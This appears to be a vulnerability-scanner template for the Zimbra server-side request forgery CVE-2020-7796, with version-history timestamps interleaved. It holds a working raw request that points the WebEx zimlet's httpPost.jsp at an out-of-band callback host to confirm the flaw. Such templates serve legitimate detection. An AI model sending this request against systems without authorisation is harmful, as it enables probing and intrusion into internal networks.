2021-08-03 00:31:23 +00:00
id : CVE-2020-7796
info :
2022-04-29 19:58:07 +00:00
name : Zimbra Collaboration Suite < 8.8.15 Patch 7 - Server-Side Request Forgery
2021-08-03 00:31:23 +00:00
author : gy741
severity : critical
2022-04-29 19:58:07 +00:00
description : "Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 is susceptible to server-side request forgery when WebEx zimlet is installed and zimlet JSP is enabled."
2021-08-19 13:59:55 +00:00
reference :
2021-08-03 00:31:23 +00:00
- https://www.adminxe.com/2183.html
2022-04-21 21:16:41 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-7796
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-7796
cwe-id : CWE-918
2022-04-21 21:16:41 +00:00
tags : cve,cve2020,zimbra,ssrf,oast
2021-08-03 00:31:23 +00:00
requests :
- raw :
- |
GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://{{interactsh-url}}%23 HTTP/1.1
Host : {{Hostname}}
matchers :
- type : word
part : interactsh_protocol # Confirms the HTTP Interaction
words :
- "http"
2022-04-21 21:16:41 +00:00
2022-04-29 19:58:07 +00:00
# Enhanced by mp on 2022/04/29